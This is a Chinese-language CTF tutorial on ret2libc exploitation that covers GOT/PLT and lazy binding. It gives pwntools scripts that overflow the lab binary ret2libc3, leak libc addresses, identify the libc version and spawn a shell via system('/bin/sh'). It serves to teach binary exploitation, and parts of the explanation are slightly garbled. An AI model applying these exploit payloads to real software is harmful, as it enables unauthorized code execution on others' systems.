前言

之前曾在Pwn入門之基礎棧溢出里面曾經提過ret2libc的相關知識，但是寫的比較籠統，感覺對新手還是不夠友好，想通過本文對ret2libc的原理和利用進行詳細講解。

前置知識

GOT表和PLT表

got表也叫全局偏移表（Global Offset Table）是Linux ELF文件中用于定位全局變量和函數的一個表。

plt表也叫過程鏈接表（Procedure Linkage Table）是Linux ELF文件中用于延遲綁定的表惡，即函數第一次被調用的時候才進行綁定。

在程序運行過程中，plt表和got表的運行過程大致如下：

用一句話來總結就是，可執行文件里保存的是plt表的地址，對應plt地址指向的是got的地址，got表指向的是glibc中的地址

在這里如果需要通過plt表獲取函數的地址，需要保證got表已經獲取了正確的地址，但如果一開始對所有函數都進行了重定位是比較麻煩且浪費資源，為此，Linux引入了延遲綁定機制。

延遲綁定

這種機制存在的目的是glibc為了節約系統資源，提高性能。其詳細過程如下

源程序在第一次調用一個函數時，首先去

如果存在一個tide函數，這個函數在plt中的條目為tide@plt，在got中的條目為tide@got，那么在第一次調用bar函數時，首先會跳轉到plt，偽代碼如下：

tide@plt; jmptide@got patchtide@got

這里會從PLT跳到GOT，如果函數從來沒有調用過，那這時GOT會跳轉回PLT并調用patch tide@got，這行代碼的作用是將bar函數真正的地址填充到tide@got，然后跳轉到bar函數真正的地址執行代碼。當下次再次調用bar函數的時候，執行路徑就是先跳轉到tide@plt、tide@got、tide真正的地址。

簡而言之就是，當一個函數被調用過后，got表里保存了他在內存中的地址，可以通過泄漏got表內存來泄漏函數地址，然后可以根據起泄漏的函數地址獲得其libc版本，從而計算其他函數在內存空間中的地址。因為libc中任意兩個函數之間的偏移是固定的。

以計算system函數在內存空間中的函數地址舉例。

1.獲取__libc_start_main函數在內存空間中的地址addr_main
2.__libc_start_main函數相對于libc.so.6的起始地址是addr_main_offset
3.system函數相對于libc.so.6的起始地址是addr_system_offset
4.則system函數在內存中真正的地址為addr_main+addr_system_offset-addr_main_offset

在我們ret2libc中我們只需要理解為，只有執行過的函數，我們才能通過got表泄漏其地址。

基本思路

ret2libc是控制函數執行libc中的函數，通常是返回至某個函數的plt處。一般情況下，會選擇執行system('/bin/sh')，因此需要找到system函數的地址看到這里相信有的師傅就會問了，為什么不能直接跳到got表，通過前面的前置知識我們知道plt表中的地址對應的是指令，got表中的地址對應的是指令地址，而返回地址必須保存一段有效的匯編指令，所以必須要用plt表 ret2libc通常可以分為下面幾種類型：

?程序中自身包含system函數和"/bin/sh"字符串
?程序中自身就有system函數，但是沒有"/bin/sh"字符串
?程序中自身沒有syetem函數和"/bin/sh"字符串，但給出了libc.so文件
?程序中自身沒有sysetm函數和"/bin/sh"字符串，并且沒有給出libc.so文件

針對前面那三種在前面的文章中已經進行過詳細講解，本文主要是針對第四種情況進行講解對于沒有給出libc.so文件的程序，我們可以通過泄漏出程序當中的某個函數的地址，通過查詢來找出其中使用lib.so版本是哪一個，然后根據lib.so的版本去找到我們需要的system函數的地址。針對常見的題目我們的解題思路是這樣的：

1.利用棧溢出及puts函數泄漏出在got表中__libc_start_main函數的地址
2.puts函數的返回地址為_start函數
3.利用最低的12位找出libc版本（即使程序有ASLR保護，也只是針對地址中間位進行隨機，最低的12位并不會發生改變）
4.利用找到的libc版本計算system函數和/bin/sh字符串在內存中的正確的地址

實戰

我們還是利用ctfwiki中的ret2libc3進行講解分析程序

根據前面分析的，我們需要找到如下幾個地址

?__libc_start_main函數在got表的地址
?_start函數的地址
?puts函數在plt表中的地址

__libc_start_main函數在got表中的地址

_start函數的地址

puts函數在plt表中的地址

獲取到這三個地址后，我們可以采用調用puts函數后，ret到main函數，用main函數里面的gets來獲取libc_start的地址

獲取libc_start地址的腳本如下

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 payload=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload) puts_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(puts_addr)) sh.recv()

即使程序有ASLR保護，也只是針對地址中間位進行隨機，最低的12位并不會發生改變，在16進制中也就是我們的最后3位，因此cd0是不會變，使用libc database search(https://libc.blukat.me/)進行查詢（網上普遍推薦的是利用LibcSearcher，但是我用LibcSearcher一直沒打通）

看到這么多libc版本挨個試可能會累死，于是再來泄漏個puts的地址

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 got_puts=0x804a018 #獲取__libc_start的地址 payload1=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(libc_start_addr)) #獲取puts的地址 payload2=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr=u32(sh.recv(4)) success("puts_addris:"+hex(puts_addr))

還剩下三個了，使用下面的腳本挨個嘗試吧

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 got_puts=0x804a018 #獲取__libc_start的地址 payload1=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(libc_start_addr)) #獲取puts的地址 payload2=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr=u32(sh.recv(4)) success("puts_addris:"+hex(puts_addr)) sh.recv() libc_start=#通過libcdatabasesearch獲取 libc_system=#通過libcdatabasesearch獲取 libc_binsh=#通過libcdatabasesearch獲取 libcbase=libc_start_addr-libc_start system_addr=libcbase+libc_system binsh_addr=libcbase+libc_binsh payload=112*b'a'+p32(system_addr)+4*b'a'+p32(binsh_addr) sh.sendline(payload) sh.interactive()

最終經過多次實驗可知，libc文件是libc6_2.31-0ubuntu9_i386 最終的完整腳本如下

frompwnimport* sh=process('./ret2libc3') puts_plt=0x8048460 addr_start=0x80484d0 got_libc_start=0x804a024 got_puts=0x804a018 #獲取__libc_start的地址 payload1=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_libc_start) sh.recv() sh.sendline(payload1) libc_start_addr=u32(sh.recv(4)) success("__libc_start_addris:"+hex(libc_start_addr)) #獲取puts的地址 payload2=112*b'a'+p32(puts_plt)+p32(addr_start)+p32(got_puts) sh.recv() sh.sendline(payload2) puts_addr=u32(sh.recv(4)) success("puts_addris:"+hex(puts_addr)) sh.recv() libc_start=0x01edf0 libc_system=0x045830 libc_binsh=0x192352 libcbase=libc_start_addr-libc_start system_addr=libcbase+libc_system binsh_addr=libcbase+libc_binsh payload=112*b'a'+p32(system_addr)+4*b'a'+p32(binsh_addr) sh.sendline(payload) sh.interactive()

成功打通

總結

ret2libc這種題型，相較于前面簡單的題目，對Linux中程序運行的理解要求更高，一開始根據網上的教程去尋找libc版本的時候發現大多數教程都是使用腳本去獲取，但在自己嘗試的時候就一直打不通，于是便放棄了腳本采用手工的方式進行查找，可能相較于通過腳本直接獲取更加費時費力，但是也通過這個倒逼自己將got表和plt表的相關知識徹底理解透徹，也捋清楚了程序在Linux中到底是如何運行的。審核編輯：李倩

聲明：本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人，不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用，如有內容侵權或者其他違規問題，請聯系本站處理。舉報投訴